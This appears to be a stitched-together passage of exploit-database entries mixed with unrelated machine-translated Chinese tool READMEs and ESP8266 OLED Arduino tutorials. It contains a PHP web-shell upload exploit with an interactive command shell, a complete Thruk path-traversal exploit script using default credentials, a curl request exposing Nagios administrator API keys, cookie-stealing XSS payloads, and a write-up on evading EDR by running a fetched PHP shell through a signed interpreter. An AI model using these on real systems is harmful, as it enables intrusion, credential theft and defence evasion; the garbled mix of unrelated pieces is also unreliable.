print("Entering pseudo-shell. Type 'exit' to quit")
while True:
command = input("\n$ ")
if command == "exit":
break
response = requests.get(f"{fileUrl}?cmd={command}")
print(response.text)
def uploadFile(url: str, filename: str, content):
endpoint = f"{url}/classes/SystemSettings.php?f=update_settings"
file = {"img": (filename, content)}
response = requests.post(endpoint, files=file)
return response
def getUploadedFileUrl(url: str, filename: str):
timeNow = datetime.now(timezone.utc).replace(second=0) # UTC time, rounded to minutes
epoch = int(timeNow.timestamp()) # Time in milliseconds
possibleFilename = f"{epoch}_{filename}"
fileUrl = f"{url}/uploads/{possibleFilename}"
response = requests.get(fileUrl)
if response.status_code == 200:
return fileUrl
def exploit(url: str):
filename = str(uuid4()) + ".php"
content = "<?php system($_GET['cmd'])?>"
response = uploadFile(url, filename, content)
if response.status_code != 200:
print(f"[File Upload] Got status code {response.status_code}. Expected 200.")
uploadedUrl = getUploadedFileUrl(url, filename)
if uploadedUrl == None:
print("Error. Could not find the uploaded file.")
exit(1)
print(f"Uploaded file is at {uploadedUrl}")
try:
interactiveShell(uploadedUrl)
except KeyboardInterrupt:
pass
print("\nQuitting.")
def getWebsiteURL(url: str):
if not url.startswith("http"):
url = "http://" + url
if url.endswith("/"):
url = url[:-1]
return url
def main():
parser = ArgumentParser(description="Exploit for CVE-2023-1826")
parser.add_argument("url", type=str, help="The url to the application's installation. Example: http://mysite:8080/php-ocls/")
args = parser.parse_args()
url = getWebsiteURL(args.url)
exploit(url)
if __name__ == "__main__":
main()
# Exploit Title: Nagios Log Server 2024R1.3.1 - API Key Exposure
# Date: 2025-04-08
# Exploit Author: Seth Kraft, Alex Tisdale
# Vendor Homepage: https://www.nagios.com/
# Vendor Changelog: https://www.nagios.com/changelog/#log-server
# Software Link: https://www.nagios.com/products/log-server/download/
# Version: Nagios Log Server 2024R1.3.1 and below
# Tested On: Nagios Log Server 2024R1.3.1 (default configuration, Ubuntu 20.04)
# CWE: CWE-200, CWE-284, CWE-522
# CVSS: 9.8 (CVSS:4.0/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H)
# Type: Information Disclosure, Improper Access Control
# Exploit Risk: Critical
## Disclosure
For ethical research purposes only. Do not target systems without proper authorization.
## Description
An API-level vulnerability in Nagios Log Server 2024R1.3.1 allows any user with a valid API token to retrieve a full list of user accounts along with their plaintext API keys, including administrator credentials. This flaw enables user enumeration, privilege escalation, and full system compromise via unauthorized use of exposed tokens.
## PoC
### Step 1: Access the vulnerable endpoint
```
curl -X GET "http://<target-ip>/nagioslogserver/index.php/api/system/get_users?token=<valid_token>"
```
## Sample Response
```json
[
{
"name": "devadmin",
"username": "devadmin",
"email": "test@example.com",
"apikey": "dcaa1693a79d651ebc29d45c879b3fbbc730d2de",
"auth_type": "admin",
...
}
]
```
# Exploit Title: Thruk Monitoring Web Interface 3.06 - Path Traversal
# Date: 08-Jun-2023
# Exploit Author: Galoget Latorre (@galoget)
# CVE: CVE-2023-34096 (Galoget Latorre)
# Vendor Homepage: https://thruk.org/
# Software Link: https://github.com/sni/Thruk/archive/refs/tags/v3.06.zip
# Software Link + Exploit + PoC (Backup): https://github.com/galoget/Thruk-CVE-2023-34096
# CVE Author Blog: https://galogetlatorre.blogspot.com/2023/06/cve-2023-34096-path-traversal-thruk.html
# GitHub Security Advisory: https://github.com/sni/Thruk/security/advisories/GHSA-vhqc-649h-994h
# Affected Versions: <= 3.06
# Language: Python 3.x
# Tested on:
# - Ubuntu 22.04.5 LTS 64-bit
# - Debian GNU/Linux 10 (buster) 64-bit
# - Kali GNU/Linux 2023.1 64-bit
# - CentOS GNU/Linux 8.5.2111 64-bit
#!/usr/bin/python3
# -*- coding:utf-8 -*-
import sys
import warnings
import requests
from bs4 import BeautifulSoup
from termcolor import cprint
# Usage: python3 exploit.py <target.site>
# Example: python3 exploit.py http://127.0.0.1/thruk/
# Disable warnings
warnings.filterwarnings('ignore')
# Set headers
headers = {
"User-Agent": "Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36"
}
def banner():
"""
Function to print the banner
"""
banner_text = """
__ __ __ __ __ __ __ __ __ __
/ \\ /|_ __ _) / \\ _) _) __ _) |__| / \\ (__\\ /__
\\__ \\/ |__ /__ \\__/ /__ __) __) | \\__/ __/ \\__)
Path Traversal Vulnerability in Thruk Monitoring Web Interface ≤ 3.06
Exploit & CVE Author: Galoget Latorre (@galoget)
LinkedIn: https://www.linkedin.com/in/galoget
"""
print(banner_text)
def usage_instructions():
"""
Function that validates the number of arguments.
The application MUST have 2 arguments:
- [0]: Name of the script
- [1]: Target URL (Thruk Base URL)
"""
if len(sys.argv) != 2:
print("Usage: python3 exploit.py <target.site>")
print("Example: python3 exploit.py http://127.0.0.1/thruk/")
sys.exit(0)
def check_vulnerability(thruk_version):
"""
Function to check if the recovered version is vulnerable to CVE-2023-34096.
Prints additional information about the vulnerability.
"""
try:
if float(thruk_version[1:5]) <= 3.06:
if float(thruk_version[4:].replace("-", ".")) < 6.2:
cprint("[+] ", "green", attrs=['bold'], end = "")
print("This version of Thruk is ", end = "")
cprint("VULNERABLE ", "red", attrs=['bold'], end = "")
print("to CVE-2023-34096!")
print(" | CVE Author Blog: https://galogetlatorre.blogspot.com/2023/06/cve-2023-34096-path-traversal-thruk.html")
print(" | GitHub Security Advisory: https://github.com/sni/Thruk/security/advisories/GHSA-vhqc-649h-994h")
print(" | CVE MITRE: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-34096")
print(" | CVE NVD NIST: https://nvd.nist.gov/vuln/detail/CVE-2023-34096")
print(" | Thruk Changelog: https://www.thruk.org/changelog.html")
print(" | Fixed version: 3.06-2+")
print("")
return True
else:
cprint("[-] ", "red", attrs=['bold'], end = "")
print("It looks like this version of Thruk is NOT VULNERABLE to CVE-2023-34096.")
return False
except:
cprint("[-] ", "red", attrs=['bold'], end = "")
print("There was an error parsing Thruk's version.\n")
return False
def get_thruk_version():
"""
Function to get Thruk's version via web scraping.
It also verifies the title of the website to check if the target is a Thruk instance.
"""
response = requests.get(target, headers=headers, allow_redirects=True, verify=False, timeout=10)
html_soup = BeautifulSoup(response.text, "html.parser")
if "<title>Thruk Monitoring Webinterface</title>" not in response.text:
cprint("[-] ", "red", attrs=['bold'], end = "")
print("Verify if the URL is correct and points to a Thruk Monitoring Web Interface.")
sys.exit(-1)
else:
# Extract version anchor tag
version_link = html_soup.find_all("a", {"class": "link text-sm"})
if len(version_link) == 1 and version_link[0].has_attr('href'):
thruk_version = version_link[0].text.strip()
cprint("[+] ", "green", attrs=['bold'], end = "")
print(f"Detected Thruk Version (Public Banner): {thruk_version}\n")
return thruk_version
else:
cprint("[-] ", "red", attrs=['bold'], end = "")
print("There was an error retrieving Thruk's version.")
sys.exit(-1)
def get_error_info():
"""
Function to cause an error in the target Thruk instance and collect additional information via web scraping.
"""
# URL that will cause an error
error_url = target + "//cgi-bin/login.cgi"
# Retrieve Any initial Cookies
error_response = requests.get(error_url,
headers=headers,
allow_redirects=False,
verify=False,
timeout=10)
cprint("[*] ", "blue", attrs=['bold'], end = "")
print("Trying to retrieve additional information...\n")
try:
# Search for the error tag
html_soup = BeautifulSoup(error_response.text, "html.parser")
error_report = html_soup.find_all("pre", {"class": "text-left mt-5"})[0].text
if len(error_report) > 0:
# Print Error Info
error_report = error_report[error_report.find("Version"):error_report.find("\n\nStack")]
cprint("[+] ", "green", attrs=['bold'], end = "")
print("Recovered Information: \n")
parsed_error_report = error_report.split("\n")
for error_line in parsed_error_report:
print(f" {error_line}")
except:
cprint("[-] ", "red", attrs=['bold'], end = "")
print("No additional information available.\n")
def get_thruk_session_auto_login():
"""
Function to login into the Thruk instance and retrieve a valid session.
It will use default Thruk's credentials available here:
- https://www.thruk.org/documentation/install.html
Change credentials if required.
"""
# Default Credentials - Change if required
username = "thrukadmin" # CHANGE ME
password = "thrukadmin" # CHANGE ME
params = {"login": username, "password": password}
cprint("[*] ", "blue", attrs=['bold'], end = "")
print(f"Trying to autenticate with provided credentials: {username}/{password}\n")
# Define Login URL
login_url = "cgi-bin/login.cgi"
session = requests.Session()
# Retrieve Any initial Cookies
session.get(target, headers=headers, allow_redirects=True, verify=False)
# Login and get thruk_auth Cookie
session.post(target + login_url, data=params, headers=headers, allow_redirects=False, verify=False)
# Get Cookies as dictionary
cookies = session.cookies.get_dict()
# Successful Login
if cookies.get('thruk_auth') is not None:
cprint("[+] ", "green", attrs=['bold'], end = "")
print("Successful Authentication!\n")
cprint("[+] ", "green", attrs=['bold'], end = "")
print(f"Login Cookie: thruk_auth={cookies.get('thruk_auth')}\n")
return session
# Failed Login
else:
if cookies.get('thruk_message') == "fail_message~~login%20failed":
cprint("[-] ", "red", attrs=['bold'], end = "")
print("Login Failed, check your credentials.")
sys.exit(401)
def cve_2023_34096_exploit_path_traversal(logged_session):
"""
Function that attempts to exploit the Path Traversal Vulnerability.
The exploit will try to upload a PoC file to multiple common folders.
This to prevent permissions errors to cause false negatives.
"""
cprint("[*] ", "blue", attrs=['bold'], end = "")
print("Trying to exploit: ", end = "")
cprint("CVE-2023-34096 - Path Traversal\n", "yellow", attrs=['bold'])
# Define Upload URL
upload_url = "cgi-bin/panorama.cgi"
# Absolute paths
common_folders = ["/tmp/",
"/etc/thruk/plugins/plugins-enabled/",
"/etc/thruk/panorama/",
"/etc/thruk/bp/",
"/etc/thruk/thruk_local.d/",
"/var/www/",
"/var/www/html/",
"/etc/",
]
# Upload PoC file to each folder
for target_folder in common_folders:
# PoC file extension is jpg due to regex validations of Thruk.
# Nevertheless this issue can still cause damage in different ways to the affected instance.
files = {'image': ("exploit.jpg", "CVE-2023-34096-Exploit-PoC-by-galoget")}
data = {"task": "upload",
"type": "image",
"location": f"backgrounds/../../../..{target_folder}"
}
upload_response = logged_session.post(target + upload_url,
data=data,
files=files,
headers=headers,
allow_redirects=False,
verify=False)
try:
upload_response = upload_response.json()
if upload_response.get("msg") == "Upload successfull" and upload_response.get("success") is True:
cprint("[+] ", "green", attrs=['bold'], end = "")
print(f"File successfully uploaded to folder: {target_folder}{files.get('image')[0]}\n")
elif upload_response.get("msg") == "Fileupload must use existing and writable folder.":
cprint("[-] ", "red", attrs=['bold'], end = "")
print(f"File upload to folder \'{target_folder}{files.get('image')[0]}\' failed due to write permissions or non-existent folder!\n")
else:
cprint("[-] ", "red", attrs=['bold'], end = "")
print("File upload failed.\n")
except:
cprint("[-] ", "red", attrs=['bold'], end = "")
print("File upload failed.\n")
if __name__ == "__main__":
banner()
usage_instructions()
# Change this with the domain or IP address to attack
if sys.argv[1] and sys.argv[1].startswith("http"):
target = sys.argv[1]
else:
target = "http://127.0.0.1/thruk/"
# Prepare Base Target URL
if not target.endswith('/'):
target += "/"
cprint("[+] ", "green", attrs=['bold'], end = "")
print(f"Target URL: {target}\n")
# Get Thruk version via web scraping
scraped_thruk_version = get_thruk_version()
# Send a request that will generate an error and collect extra info
get_error_info()
# Check if the instance is vulnerable to CVE-2023-34096
vulnerable_status = check_vulnerability(scraped_thruk_version)
if vulnerable_status:
cprint("[+] ", "green", attrs=['bold'], end = "")
print("The Thruk version found in this host is vulnerable to CVE-2023-34096. Do you want to try to exploit it?")
# Confirm exploitation
option = input("\nChoice (Y/N): ").lower()
print("")
if option == "y":
cprint("[*] ", "blue", attrs=['bold'], end = "")
print("The tool will attempt to exploit the vulnerability by uploading a PoC file to common folders...\n")
# Login into Thruk instance
valid_session = get_thruk_session_auto_login()
# Exploit Path Traversal Vulnerability
cve_2023_34096_exploit_path_traversal(valid_session)
elif option == "n":
cprint("[*] ", "blue", attrs=['bold'], end = "")
print("No exploitation attempts were performed, Goodbye!\n")
sys.exit(0)
else:
cprint("[-] ", "red", attrs=['bold'], end = "")
print("Unknown option entered.")
sys.exit(1)
else:
cprint("[-] ", "red", attrs=['bold'], end = "")
print("The current Thruk's version is NOT VULNERABLE to CVE-2023-34096.")
sys.exit(2)
# Exploit Title: Tree Page View Plugin 1.6.7 - Cross Site Scripting (XSS)
# Google Dork: inurl:/wp-content/plugins/cms-tree-page-view/
# Date: 2023-04-24
# Exploit Author: LEE SE HYOUNG (hackintoanetwork)
# Vendor Homepage: https://wordpress.org/plugins/cms-tree-page-view/
# Software Link: https://downloads.wordpress.org/plugin/cms-tree-page-view.1.6.6.zip
# Category: Web Application
# Version: 1.6.7
# Tested on: Debian / WordPress 6.1.1
# CVE : CVE-2023-30868
# Reference: https://patchstack.com/database/vulnerability/cms-tree-page-view/wordpress-cms-tree-page-view-plugin-1-6-7-cross-site-scripting-xss-vulnerability?_s_id=cve
# 1. Technical Description:
The CMS Tree Page View plugin for WordPress has a Reflected Cross-Site Scripting vulnerability up to version 1.6.7.
This is due to the post_type parameter not properly escaping user input. As a result, users with administrator privileges or higher can inject JavaScript code that will execute whenever accessed.
# 2. Proof of Concept (PoC):
WordPress CMS Tree Page View Plugin <= 1.6.7 Cross-Site Scripting (XSS)
In the case of this vulnerability, there are two XSS PoCs available: one for version 1.6.6 and another for version 1.6.7.
1. CMS Tree Page View Plugin <= 1.6.6
a. Send the following URL to users with administrator privileges or higher: http://localhost:8888/wp-admin/edit.php?page=cms-tpv-page-post&post_type=%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E.
b. your payload will be executed.
[!] note : To make the payload work, the "In menu" option under Settings -> CMS Tree Page View -> Select where to show a tree for pages and custom post types needs to be enabled for posts.
2. CMS Tree Page View Plugin <= 1.6.7
a. Send the following URL to users with administrator privileges or higher: http://localhost:8888/wp-admin/edit.php?page=cms-tpv-page-post&post_type=%22+accesskey%3DC+onclick%3Djavascript%3Aalert%281%29%3B+a%3D%22.
b. Your payload will execute the script when the user presses Ctrl + Alt + c (Mac) or Alt + Shift + c (Windows).
[!] note : To make the payload work, the "In menu" option under Settings -> CMS Tree Page View -> Select where to show a tree for pages and custom post types needs to be enabled for posts.
# Exploit Title: MISP 2.4.171 Stored XSS [CVE-2023-37307] (Authenticated)
# Date: 8th October 2023
# Exploit Author: Mücahit Çeri
# Vendor Homepage: https://www.circl.lu/
# Software Link: https://github.com/MISP/MISP
# Version: 2.4.171
# Tested on: Ubuntu 20.04
# CVE : CVE-2023-37307
# Exploit:
Logged in as low privileged account
1)Click on the "Galaxies" button in the top menu
2)Click "Add Cluster" in the left menu.
3)Enter the payload "</title><script>alert(1)</script>" in the Name parameter.
4)Other fields are filled randomly. Click on Submit button.
5)When the relevant cluster is displayed, we see that alert(1) is running
# Exploit Title: Boom CMS v8.0.7 - Cross Site Scripting
References (Source): https://www.vulnerability-lab.com/get_content.php?id=2274
Release Date: 2023-07-03
Vulnerability Laboratory ID (VL-ID): 2274
Product & Service Introduction:
===============================
Boom is a fully featured, easy to use CMS. More than 10 years, and many versions later, Boom is an intuitive, WYSIWYG CMS that makes life
easy for content editors and website managers. Working with BoomCMS is simple. It's easy and quick to learn and start creating content.
It gives editors control but doesn't require any technical knowledge.
(Copy of the Homepage:https://www.boomcms.net/boom-boom )
Abstract Advisory Information:
==============================
The vulnerability laboratory core research team discovered a persistent cross site vulnerability in the Boom CMS v8.0.7 web-application.
Affected Product(s):
====================
UXB London
Product: Boom v8.0.7 - Content Management System (Web-Application)
Vulnerability Disclosure Timeline:
==================================
2022-07-24: Researcher Notification & Coordination (Security Researcher)
2022-07-25: Vendor Notification (Security Department)
2023-**-**: Vendor Response/Feedback (Security Department)
2023-**-**: Vendor Fix/Patch (Service Developer Team)
2023-**-**: Security Acknowledgements (Security Department)
2023-07-03: Public Disclosure (Vulnerability Laboratory)
Discovery Status:
=================
Published
Exploitation Technique:
=======================
Remote
Severity Level:
===============
Medium
Authentication Type:
====================
Restricted Authentication (User Privileges)
User Interaction:
=================
Low User Interaction
Disclosure Type:
================
Responsible Disclosure
Technical Details & Description:
================================
A persistent script code injection web vulnerability has been discovered in the official Boom CMS v8.0.7 web-application.
The vulnerability allows remote attackers to inject own malicious script codes with persistent attack vector to compromise
browser to web-application requests from the application-side.
The vulnerability is located in the input fields of the album title and album description in the asset-manager module.
Attackers with low privileges are able to add own malformed albums with malicious script code in the title and description.
After the inject the albums are being displayed in the backend were the execute takes place on preview of the main assets.
The attack vector of the vulnerability is persistent and the request method to inject is post. The validation tries to parse
the content by usage of a backslash. Thus does not have any impact to inject own malicious
java-scripts because of its only performed for double- and single-quotes to prevent sql injections.
Successful exploitation of the vulnerability results in session hijacking, persistent phishing attacks, persistent
external redirects to malicious source and persistent manipulation of affected application modules.
Request Method(s):
[+] POST
Vulnerable Module(s):
[+] assets-manager (album)
Vulnerable Function(s):
[+] add
Vulnerable Parameter(s):
[+] title
[+] description
Affected Module(s):
[+] Frontend (Albums)
[+] Backend (Albums Assets)
Proof of Concept (PoC):
=======================
The persistent input validation web vulnerability can be exploited by remote attackers with low privileged user account and with low user interaction.
For security demonstration or to reproduce the persistent cross site web vulnerability follow the provided information and steps below to continue.
Manual steps to reproduce the vulnerability ...
1. Login to the application as restricted user
2. Create a new album
3. Inject a test script code payload to title and description
4. Save the request
5. Preview frontend (albums) and backend (assets-manager & albums listing) to provoke the execution
6. Successful reproduce of the persistent cross site web vulnerability!
Payload(s):
><script>alert(document.cookie)</script><div style=1
<a onmouseover=alert(document.cookie)>test</a>
--- PoC Session Logs (Inject) ---
https://localhost:8000/boomcms/album/35
Host: localhost:8000
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:90.0) Gecko/20100101 Firefox/90.0
Accept: application/json, text/javascript, */*; q=0.01
Content-Type: application/json
X-Requested-With: XMLHttpRequest
Content-Length: 263
Origin:https://localhost:8000
Connection: keep-alive
Referer:https://localhost:8000/boomcms/asset-manager/albums/[evil.source]
Sec-Fetch-Site: same-origin
{"asset_count":1,"id":35,"name":""><[INJECTED SCRIPT CODE PAYLOAD 1!]>","description":""><[INJECTED SCRIPT CODE PAYLOAD 2!]>",
"slug":"a","order":null,"site_id":1,"feature_image_id":401,"created_by":9,"deleted_by"
:null,"deleted_at":null,"created_at":"2021-xx-xx xx:x:x","updated_at":"2021-xx-xx xx:x:x"}
-
PUT: HTTP/1.1 200 OK
Server: Apache
Cache-Control: no-cache, private
Set-Cookie: Max-Age=7200; path=/
Cookie: laravel_session=eyJpdiI6ImVqSkTEJzQjlRPT0iLCJ2YWx1ZSI6IkxrdUZNWUF
VV1endrZk1TWkxxdnErTUFDY2pBS0JSYTVFakppRnNub1kwSkF6amQTYiLCJtY
yOTUyZTk3MjhlNzk1YWUzZWQ5NjNhNmRkZmNlMTk0NzQ5ZmQ2ZDAyZTED;
Max-Age=7200; path=/; httponly
Content-Length: 242
Connection: Keep-Alive
Content-Type: application/json
-
https://localhost:8000/boomcms/asset-manager/albums/[evil.source]
Host: localhost:8000
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:90.0) Gecko/20100101 Firefox/90.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: de,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Cookie: laravel_session=eyJpdiI6ImVqSkTEJzQjlRPT0iLCJ2YWx1ZSI6IkxrdUZNWUF
VV1endrZk1TWkxxdnErTUFDY2pBS0JSYTVFakppRnNub1kwSkF6amQTYiLCJtY
yOTUyZTk3MjhlNzk1YWUzZWQ5NjNhNmRkZmNlMTk0NzQ5ZmQ2ZDAyZTED;
-
GET: HTTP/1.1 200 OK
Server: Apache
Cache-Control: no-cache, private
Set-Cookie:
Vary: Accept-Encoding
Content-Length: 7866
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
-
Vulnerable Source: asset-manager/albums/[ID]
<li data-album="36">
<a href="#albums/20">
<div>
<h3>[MALICIOUS INJECTED SCRIPT CODE PAYLOAD 1!]</h3>
<p class="description">"><[MALICIOUS INJECTED SCRIPT CODE PAYLOAD 2!]></p>
<p class='count'><span>0</span> assets</p>
</div>
</a>
</li>
</iframe></p></div></a></li></ul></div></div>
</div>
<div id="b-assets-view-asset-container"></div>
<div id="b-assets-view-selection-container"></div>
<div id="b-assets-view-album-container"><div><div id="b-assets-view-album">
<div class="heading">
<h1 class="bigger b-editable" contenteditable="true"><[MALICIOUS INJECTED SCRIPT CODE PAYLOAD 1!]></h1>
<p class="description b-editable" contenteditable="true"><[MALICIOUS INJECTED SCRIPT CODE PAYLOAD 2!]></p>
</div>
Solution - Fix & Patch:
=======================
The vulnerability can be patched by a secure parse and encode of the vulnerable title and description parameters.
Restrict the input fields and disallow usage of special chars. Sanitize the output listing location to prevent further attacks.
Security Risk:
==============
The security risk of the persistent input validation web vulnerability in the application is estimated as medium.
Credits & Authors:
==================
Vulnerability-Lab [Research Team] -https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab
逃避Edr是简单的方法,没有触摸任何API的钩子。
理论
我注意到大多数EDR无法扫描脚本文件,仅将其视为文本文件。尽管这对他们来说可能是不幸的,但这是我们获利的机会。
诸如居住在内存或线程注入中的浮华方法受到大量监控。如果没有有效证书授权签名的二进制,几乎不可能执行。
输入Byosi(带上自己的脚本解释器)。每个脚本解释器都由其创建者签名,每个证书都是有效的。在实时环境中进行的测试显示出令人惊讶的结果:该存储库的高度签名的PHP脚本不仅在由CrowdStrike和Trellix监控的系统上运行,而且还建立了外部连接而没有触发任何EDR检测。 EDR通常会忽略脚本文件,而是专注于植入物交付的二进制文件。它们配置为检测二进制文件中的高熵或可疑段,而不是简单的脚本。
这种攻击方法利用了这一监督,以获得可观的利润。 Powershell脚本的步骤反映了开发人员首次进入环境时可能会做什么。值得注意的是,只有四行Powershell代码完全逃避EDR检测,而Defender/AMSI也对此视而不见。除了有效性外,Github担任可信赖的部位。
这个脚本做什么
PowerShell脚本通过四个简单步骤(技术上3):实现EDR/AV逃避
1.)它为Windows获取PHP档案,并将其提取到“ C: \ temp”中的名为“ php”的新目录中。
2.)然后该脚本继续获取Impulse PHP脚本或Shell,将其保存在相同的'C: \ temp \ php'目录中。
3.)之后,它使用白色PHP二进制(将二进制的大多数限制豁免将阻止二进制限制的大多数限制,这将阻止二进制运行。特别有趣的是,如果我的内存正确地为我服务,Sentinel One无法扫描PHP文件类型。因此,请随时让您的想象力疯狂。
免责声明。
我对滥用这一点绝不负责。这个问题是EDR保护方面的主要盲点,我只是将其引起所有人的注意。
感谢节
非常感谢@IM4X5YN74X亲切地称其为Byosi的名字,并帮助ENV测试将这种攻击方法带入生活。
编辑
似乎MS Defender现在正将PHP脚本标记为恶意,但仍然完全允许PowerShell脚本完全执行。因此,修改PHP脚本。
编辑
Hello Sentinel One :)可能要确保您制作未嵌入的链接。
Bellingcat电报电话检查器的增强版本!
Python脚本使用电话号码或用户名检查电报帐户。
功能
检查单个或多个电话号码和用户名从文本文件自动下载配置文件导入数字图片将结果保存为JSON安全凭证存储详细的用户信息
安装
克隆repository: Git Clone 3https://Github.com/unnohhohwn/telegram-checkecker.git.
CD Telegram-checker安装所需软件包: PIP install -R Euncess.txt
要求
要求的内容.txt:
电视
富有的
点击
python-dotenv或单独安装包裹:
PIP安装Telethon Rich Click Python -Dotenv
fighturation
首次运行脚本时,您需要: -Telegram API凭据(从3https://my.telegram.telegram.org/apps获取) - 您的Telegram电话号码,包括CountryCode + - 验证代码(发送给您的电视台)
用法
运行脚本:
python telegram_checker.py从options : 1。从输入2中检查电话号码。从文件3中检查电话号码。从输入4中检查用户名。从文件5中检查用户名。清除保存的凭据6。退出。退出
输出
结果保存在: -Results/ - 带有详细信息的JSON文件-Profile_photos/ - 下载的个人资料图片
note
此工具仅用于教育目的。请尊重电报的服务条款和用户隐私。
许可证
MIT许可证
# Exploit Title: Wordpress Plugin EventON Calendar 4.4 - Unauthenticated Event Access
# Date: 03.08.2023
# Exploit Author: Miguel Santareno
# Vendor Homepage: https://www.myeventon.com/
# Version: 4.4
# Tested on: Google and Firefox latest version
# CVE : CVE-2023-2796
# 1. Description
The plugin lacks authentication and authorization in its eventon_ics_download ajax action, allowing unauthenticated visitors to access private and password protected Events by guessing their numeric id.
# 2. Proof of Concept (PoC)
Proof of Concept:
https://example.com/wp-admin/admin-ajax.php?action=eventon_ics_download&event_id=value
:
状态检查器是一个Python脚本,它根据其HTTP状态代码检查一个或多个URL/域的状态以及类别。版本1.0.0由Black-Scorp10 T.Me/Black-Scorp10创建,
功能
检查单个或多个URL/域的状态。异步HTTP请求提高性能。颜色编码的输出,以更好地可视化状态代码。检查多个URL时进度栏。将结果保存到输出文件。无法访问的URL和无效响应的错误处理。命令行界面,用于简化使用。
安装
克隆repository: bash git克隆3https://github.com/your_username/status-checker.git cd status-checker
安装依赖项: bash pip install -r unigess.txt
用法
python status_checker.py [-h] [-d域] [-l list] [-o output] [-v] [-update] -d,-domain:单个域/url要检查。 -l,-list:文件,其中包含要检查的域/URL列表。 -o,-ox -oxput:文件以保存输出。 -v,-version:显示版本信息。 -update:更新工具。 example: python status_checker.py -l urls.txt -o results.txt Preview
许可证
此项目是根据MIT许可证获得许可的- 有关详细信息,请参见许可证文件。
Equipment List
esp8266 development board oled (0.96) DuPont Line
Equipment circuit diagram
Add library
u8g2 library file
Project 1 Hello World
/*
HelloWorld.ino
esp8266+oled project example
Forum: bbskali.cn
Blog: blog.bbskali.cn
*/
#include Arduino.h
#include U8g2lib.h
#ifdef U8X8_HAVE_HW_SPI
#include SPI.h
#endif
#ifdef U8X8_HAVE_HW_I2C
#include Wire.h
#endif
U8G2_SSD1306_128X64_NONAME_F_SW_I2C u8g2(U8G2_R0, /* clock=*/D2, /* data=*/D1, /* reset=*/U8X8_PIN_NONE); //Here D1 D2 is the corresponding welding pin
void setup(void) {
u8g2.begin();
}
void loop(void) {
u8g2.clearBuffer(); //clear the internal memory
u8g2.setFont(u8g2_font_ncenB08_tr); //choose a suitable font
u8g2.drawStr(0,10,'Hello World!'); //write something to the internal memory
u8g2.sendBuffer(); //transfer internal memory to the display
delay(1000);
}The effect is as follows
The code of
Item 2 Display Chinese characters
is as follows:
/*
esp8266+oled display
Show Chinese character items
Forum address: bbskali.cn
Blog: blog.bbskali.cn
*/
#include Arduino.h
#include U8g2lib.h
#ifdef U8X8_HAVE_HW_SPI
#include SPI.h
#endif
#ifdef U8X8_HAVE_HW_I2C
#include Wire.h
#endif
U8G2_SSD1306_128X64_NONAME_F_SW_I2C u8g2(U8G2_R0, /* clock=*/D2, /* data=*/D1, /* reset=*/U8X8_PIN_NONE); //All Boards without Reset of the Display
void setup(void) {
u8g2.begin();
u8g2.enableUTF8Print(); //enable UTF8 support for the Arduino print() function
}
void loop(void) {
u8g2.setFont(u8g2_font_unifont_t_chinese2); //use chinese2 for all the glyphs of 'Hello world'
u8g2.setFontDirection(0);
u8g2.clearBuffer();
u8g2.setCursor(0, 15);
u8g2.print('kali forum');
u8g2.setCursor(0, 30);
u8g2.print('bbskali.cn'); //Chinese 'Hello World'
u8g2.setCursor(0, 45);
u8g2.print('kali Hacker Teaching');
u8g2.sendBuffer();
delay(1000);
}The effects are as follows:
The code of
Item 3 Display multiple lines of text
is as follows:
/*
*/
#include Arduino.h
#include U8g2lib.h
#ifdef U8X8_HAVE_HW_SPI
#include SPI.h
#endif
#ifdef U8X8_HAVE_HW_I2C
#include Wire.h
#endif
U8G2_SSD1306_128X64_NONAME_1_SW_I2C u8g2(U8G2_R0, /* clock=*/D2, /* data=*/D1, /* reset=*/U8X8_PIN_NONE); //All Boards without Reset of the Display
#define FONT u8g2_font_wqy14_t_gb2312b
//#define FONT u8g2_font_wqy16_t_chinese1
//#define FONT u8g2_font_wqy16_t_gb2312b
//The next two macros define the scroll speed of the short story
#define SCROLL_DELTA 2
#define SCROLL_DELAY 200
const char c_str[]=
'Shen Nong\n\n'
'KALI Forum Introduction\n'
'kali forum was created at 20\n'
'17, Webmaster Priess\n'
'This forum is based on kali'
'Full Research and Cybersecurity\n'
'For the convenience of friends' learning\n'
'We built this forum\n'
'Forum study is completely free\n'
'Our URL :\n'
'bbskali,cn\n'
'WeChat official account:\n'
'【kali Hacker Teaching】\n'
'Thank you for your attention. \n';
char buf[48]; //there are at most 8 chinese glyphs per line, max buf size is 8*3=24
uint8_t total_lines; //the total number of lines in the story
uint8_t i; //loop variable for the lines
uint8_t line_cnt; //number of lines to draw, usually equal to lines_per_draw
uint8_t start_line; //topmost visible line, derived from top_window_pos
uint8_t lines_per_draw; //how many lines to draw on the screen, derived from font and display height
uint16_t glyph_height; //height of the glyphs
uint16_t top_window_pos; //defines the display position in pixel within the text
uint16_t total_height; //total height in pixel, derived from font height and total_lines
u8g2_uint_t top_offset; //offset between the first visible line and the display
void setup(void) {
/* U8g2 Project: SSD1306 Test Board */
pinMode(D2, OUTPUT);
pinMode(D1, OUTPUT);
digitalWrite(10, 0);
digitalWrite(9, 0);
/* U8g2 Project: T6963 Test Board */
//pinMode(18, OUTPUT);
//digitalWrite(18, 1);
/* U8g2 Project: KS0108 Test Board */
//pinMode(16, OUTPUT);
//digitalWrite(16, 0);
/* U8g2 Project: LC7981 Test Board, connect RW to GND */
//pinMode(17, OUTPUT);
//digitalWrite(17, 0);
/* U8g2 Project: Pax Instruments Shield: Enable Backlight */
//pinMode(6, OUTPUT);
//digitalWrite(6, 0);
u8g2.begin();
/* select a font */
//u8g2.setFont(u8g2_font_wqy12_t_chinese1); //two unknown glyphs
//u8g2.setFont(u8g2_font_wqy12_t_chinese3); //two unknown glyphs
//u8g2.setFont(u8g2_font_wqy12_t_gb2312a); //';' is missing
//u8g2.setFont(u8g2_font_wqy12_t_gb2312b); //all glyphs available
u8g2.setFont(FONT);
/* calculate the length of the text in lines */
total_lines=u8x8_GetStringLineCnt(c_str);
/* get the height of the glyphs */
glyph_height=u8g2.getMaxCharHeight();
